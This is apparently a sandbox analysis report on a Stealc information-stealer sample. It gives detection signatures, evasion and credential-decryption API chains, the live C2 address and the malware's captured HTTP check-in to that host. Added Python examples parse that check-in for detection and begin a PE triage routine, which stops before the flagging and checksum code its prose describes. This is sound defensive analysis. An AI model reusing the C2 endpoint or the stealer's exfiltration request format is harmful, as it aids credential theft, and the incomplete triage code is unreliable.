
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532547
MD5: c611a14ca47ba7634683b36724d2b4c8
SHA1: 537c413a3e9060f795510eb8d8659ad5b6de3080
SHA256: ba6b7db3b9727fd4132bd4e2e6065f0b28c0e21e0bcac29abb2a2d9e0a81425f
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5776 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C611A14CA47BA7634683B36724D2B4C8)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source / Rule / Description / Author):
  • dump.pcap / JoeSecurity_Stealc_1 / Yara detected Stealc / Joe Security
  • 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
  • 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
  • 00000000.00000003.1748761507.00000000055E0000.00000004.00001000.00020000.00000000.sdmp / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
  • Process Memory Space: file.exe PID: 5776 / JoeSecurity_PowershellDownloadAndExecute / Yara detected Powershell download and execute / Joe Security
  • Process Memory Space: file.exe PID: 5776 / JoeSecurity_Stealc / Yara detected Stealc / Joe Security
  • 0.2.file.exe.c00000.0.unpack / JoeSecurity_Stealc / Yara detected Stealc / Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp / SID / Severity / Classtype / Source IP:Port -> Destination IP:Port / Protocol):
  • 2024-10-13T16:54:08.608740+0200 / 2044243 / 1 / Malware Command and Control Activity Detected / 192.168.2.4:49730 -> 185.215.113.37:80 / TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.c00000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.php% | Virustotal: Detection: 16%
Source: http://185.215.113.37/rsonation | Virustotal: Detection: 16%
Source: http://185.215.113.37/k | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpi | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C09AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C07240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C09B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C18EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CGIEBAFHJJDBGCAKJJKF
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 43 32 44 35 39 41 43 36 34 44 31 37 37 39 35 32 35 32 35 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 2d 2d 0d 0a
    Data Ascii (CRLF line breaks restored from the raw bytes):
    ------CGIEBAFHJJDBGCAKJJKF
    Content-Disposition: form-data; name="hwid"

    96C2D59AC64D1779525253
    ------CGIEBAFHJJDBGCAKJJKF
    Content-Disposition: form-data; name="build"

    doma
    ------CGIEBAFHJJDBGCAKJJKF--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times; the C2 is addressed by literal IP, so no lookup precedes the connection)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C06280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: GET / HTTP/1.1 and POST /e2b1563c6670f193.php HTTP/1.1 (the same two requests as listed above, attributed to an unknown source)
Source: file.exe, 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1803785871.00000000017DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1803785871.00000000017E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1803785871.00000000017C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1803785871.00000000017E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1803785871.00000000017E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%
Source: file.exe, 00000000.00000002.1803785871.00000000017C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
Source: file.exe, 00000000.00000002.1803785871.00000000017DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/k
Source: file.exe, 00000000.00000002.1803785871.00000000017DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/rsonation
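The check-in above is the only C2 exchange in the capture: one multipart POST with two form fields, hwid and build, sent with no User-Agent header. The Python below is an added example, not code from the report, from Joe Sandbox or from Stealc itself. It rebuilds the request body from the report's own hex dump, parses the multipart form without any third-party library, and applies a detection heuristic modelled on this single capture. The heuristic (POST to a .php path, no User-Agent, exactly the fields hwid and build, hwid as uppercase hex of at least 16 characters), the function names and the minimum hwid length are assumptions of this example, not a vendor rule.

```python
import re
from typing import Dict, Optional

# Request body exactly as the report's hex dump of the POST to
# /e2b1563c6670f193.php shows it (Content-Length: 211 in the captured headers).
C2_BODY_HEX = (
    "2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b "
    "20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "39 36 43 32 44 35 39 41 43 36 34 44 31 37 37 39 35 32 35 32 35 33 0d 0a "
    "2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b "
    "20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a "
    "64 6f 6d 61 0d 0a "
    "2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 2d 2d 0d 0a"
)
C2_BODY = bytes.fromhex(C2_BODY_HEX)

# Request line and headers as captured. Note the absence of a User-Agent header,
# which the report flags separately ("HTTP GET or POST without a user agent").
CAPTURED_REQUEST = {
    "method": "POST",
    "path": "/e2b1563c6670f193.php",
    "headers": {
        "Content-Type": "multipart/form-data; boundary=----CGIEBAFHJJDBGCAKJJKF",
        "Host": "185.215.113.37",
        "Content-Length": "211",
        "Connection": "Keep-Alive",
        "Cache-Control": "no-cache",
    },
    "body": C2_BODY,
}


def boundary_from_content_type(content_type: str) -> Optional[str]:
    """Pull the boundary parameter (quoted or bare) out of a multipart Content-Type."""
    m = re.search(r'boundary=(?:"([^"]+)"|([^;\s]+))', content_type)
    return (m.group(1) or m.group(2)) if m else None


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Minimal multipart/form-data parser returning {field name: raw value}.

    Parts are delimited by "--" + boundary; the closing delimiter carries a
    trailing "--". Part headers and value are separated by an empty line.
    """
    delimiter = b"--" + boundary.encode("ascii")
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:      # element 0 is the preamble (empty here)
        if part.startswith(b"--"):              # closing delimiter "--\r\n": we are done
            break
        if part.startswith(b"\r\n"):            # CRLF that ends the delimiter line
            part = part[2:]
        header_blob, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'[;\s]name="([^"]*)"', header_blob)   # not "filename="
        if name is None:
            continue
        fields[name.group(1).decode("ascii")] = value.removesuffix(b"\r\n")
    return fields


def extract_checkin(request: dict) -> Dict[str, str]:
    """Decode the form fields of a captured check-in request as text."""
    boundary = boundary_from_content_type(request["headers"].get("Content-Type", ""))
    if boundary is None:
        return {}
    parsed = parse_multipart(request["body"], boundary)
    return {k: v.decode("ascii", "replace") for k, v in parsed.items()}


# Heuristic modelled on this one capture (an assumption of this example, not a
# vendor rule): POST to a .php path, no User-Agent, multipart body whose only
# fields are "hwid" (uppercase hex, here 22 characters) and "build".
HWID_RE = re.compile(r"^[0-9A-F]{16,}$")


def is_stealc_checkin(request: dict) -> bool:
    headers = {k.lower(): v for k, v in request["headers"].items()}
    if request["method"] != "POST" or not request["path"].endswith(".php"):
        return False
    if "user-agent" in headers:
        return False
    if not headers.get("content-type", "").startswith("multipart/form-data"):
        return False
    fields = extract_checkin(request)
    return set(fields) == {"hwid", "build"} and bool(HWID_RE.match(fields["hwid"]))


if __name__ == "__main__":
    print(extract_checkin(CAPTURED_REQUEST), is_stealc_checkin(CAPTURED_REQUEST))
```

The parser works on the raw bytes rather than on the collapsed "Data Ascii" view, so the CRLF framing the report flattens is handled correctly; the "build" value is the same "doma" that the configuration extractor reports as the botnet name, which is a useful cross-check when writing a network signature from a single sample.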

                System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC9054
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FCE173
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F4916E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD2153
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F86119
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FCAAC1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC5AAE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F79A74
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FD339D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EC9C37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FCFD64
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC7507
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EF9E8F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FCC672
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC4F6C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E7BF49
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00C045C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: nezugdgl ZLIB complexity 0.9950165109536082
Source: file.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: file.exe, 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1748761507.00000000055E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C18680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C13720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RCN7LLR0.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1844736 > 1048576
Source: file.exe | Static PE information: Raw size of nezugdgl is bigger than: 0x100000 < 0x19c400

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.c00000.0.unpack | unpacked (in memory): (empty):EW; .rsrc:W; .idata:W; (empty):EW; nezugdgl:EW; ksoeejvz:EW; .taggant:EW | vs. original (on disk): (empty):ER; .rsrc:W; .idata:W; (empty):EW; nezugdgl:EW; ksoeejvz:EW; .taggant:EW
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C19860 GetProcAddress (x21), LoadLibraryA (x5), GetProcAddress (x7)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c91ed should be: 0x1ca00c
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: nezugdgl
Source: file.exe | Static PE information: section name: ksoeejvz
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0100710F | push 3BB60286h; mov dword ptr [esp], ebp | at 0_2_0100713F
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FFB0EF | push 4925F150h; mov dword ptr [esp], edx | at 0_2_00FFB120
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FFB0EF | push 278294A3h; mov dword ptr [esp], edx | at 0_2_00FFB142
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0106792D | push 48BD9D13h; mov dword ptr [esp], edi | at 0_2_0106794D
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_01049141 | push edx; mov dword ptr [esp], ebx | at 0_2_01049169
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_010CA949 | push ecx; mov dword ptr [esp], eax | at 0_2_010CA9B5
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_010CA949 | push 6CA63701h; mov dword ptr [esp], ebx | at 0_2_010CA9DC
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0109E142 | push edi; mov dword ptr [esp], edx | at 0_2_0109E1B9
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00E660B9 | push 577F9AB1h; mov dword ptr [esp], esp | at 0_2_00E67218
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0103F976 | push ebp; mov dword ptr [esp], eax | at 0_2_0103F9AB
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_0102919B | push eax; mov dword ptr [esp], ebx | at 0_2_010291AB
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push 61797DBBh; mov dword ptr [esp], eax | at 0_2_00FC9060
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push ebp; mov dword ptr [esp], edx | at 0_2_00FC9064
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push ecx; mov dword ptr [esp], 19970B26h | at 0_2_00FC9079
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push edi; mov dword ptr [esp], ebx | at 0_2_00FC90AF
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push ebp; mov dword ptr [esp], edx | at 0_2_00FC90D3
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push eax; mov dword ptr [esp], ecx | at 0_2_00FC90E9
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push 0FEF3131h; mov dword ptr [esp], ebx | at 0_2_00FC9256
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push 5DC6D4F6h; mov dword ptr [esp], edi | at 0_2_00FC9301
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push 71C5FB60h; mov dword ptr [esp], eax | at 0_2_00FC933D
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push edx; mov dword ptr [esp], esi | at 0_2_00FC93C0
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push edi; mov dword ptr [esp], ebp | at 0_2_00FC942B
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push 11C2F5FDh; mov dword ptr [esp], eax | at 0_2_00FC943E
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push ebx; mov dword ptr [esp], edi | at 0_2_00FC9453
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push edx; mov dword ptr [esp], eax | at 0_2_00FC9489
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push 368B1250h; mov dword ptr [esp], ebp | at 0_2_00FC9491
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push 5E96FB7Ah; mov dword ptr [esp], ebx | at 0_2_00FC9567
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push 06EDCE5Bh; mov dword ptr [esp], edi | at 0_2_00FC961F
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push 5A732B07h; mov dword ptr [esp], ecx | at 0_2_00FC965D
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push 3C6B24A1h; mov dword ptr [esp], ebx | at 0_2_00FC967E
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00FC9054 | push edi; mov dword ptr [esp], ebx | at 0_2_00FC96C2
Source: file.exe | Static PE information: section name: nezugdgl entropy: 7.953976955456083
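The static findings in this section (two unnamed sections, the non-standard names nezugdgl, ksoeejvz and .taggant, sections that are both writable and executable, an entry point inside .taggant, a header checksum that does not match the file, and a section with entropy close to 8 bits per byte) are all things that can be checked without running the sample. The Python below is an added example, not Joe Sandbox's code and not the sample: it builds a constructed PE32 image modelled on the section layout reported here (a real triage would read the file from disk), parses the section table with the standard library only, and flags the same conditions. The checksum routine follows the algorithm used by public reimplementations such as pefile; the 7.0 entropy threshold and the list of "standard" section names are assumptions of this example.

```python
import math
import struct
from collections import Counter
from typing import Dict, List, Tuple

SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc",
                     ".reloc", ".tls", ".pdata", ".CRT"}          # assumed "normal" names
SECTION_HDR = "<8sIIIIIIHHI"                                    # IMAGE_SECTION_HEADER (40 bytes)


def build_pe32(sections: List[Tuple[str, int, bytes, int]], entry_rva: int, checksum: int = 0) -> bytes:
    """Construct a minimal PE32 image from (name, RVA, raw bytes, characteristics) tuples.
    Test input only; a real triage would read the file from disk instead."""
    e_lfanew, opt_size = 0x80, 224
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)        # Magic = PE32
    struct.pack_into("<I", opt, 16, entry_rva)    # AddressOfEntryPoint
    struct.pack_into("<I", opt, 64, checksum)     # CheckSum
    raw_off = (e_lfanew + 24 + opt_size + 40 * len(sections) + 0x1FF) & ~0x1FF
    hdrs, bodies = b"", b""
    for name, rva, data, chars in sections:
        raw = data.ljust((len(data) + 0x1FF) & ~0x1FF, b"\0")   # 512-byte file alignment
        hdrs += struct.pack(SECTION_HDR, name.encode(), len(data), rva, len(raw),
                            raw_off + len(bodies), 0, 0, 0, 0, chars)
        bodies += raw
    return (dos + b"PE\0\0" + coff + bytes(opt) + hdrs).ljust(raw_off, b"\0") + bodies


def parse_pe(data: bytes) -> Dict:
    """Read entry point, CheckSum and the section table of a PE32 image."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    sections = []
    for i in range(nsec):
        name, vsize, rva, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "rva": rva, "vsize": vsize,
                         "raw": data[rawptr:rawptr + rawsize], "chars": chars})
    return {"entry": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum": struct.unpack_from("<I", data, opt + 64)[0],
            "checksum_offset": opt + 64, "sections": sections}


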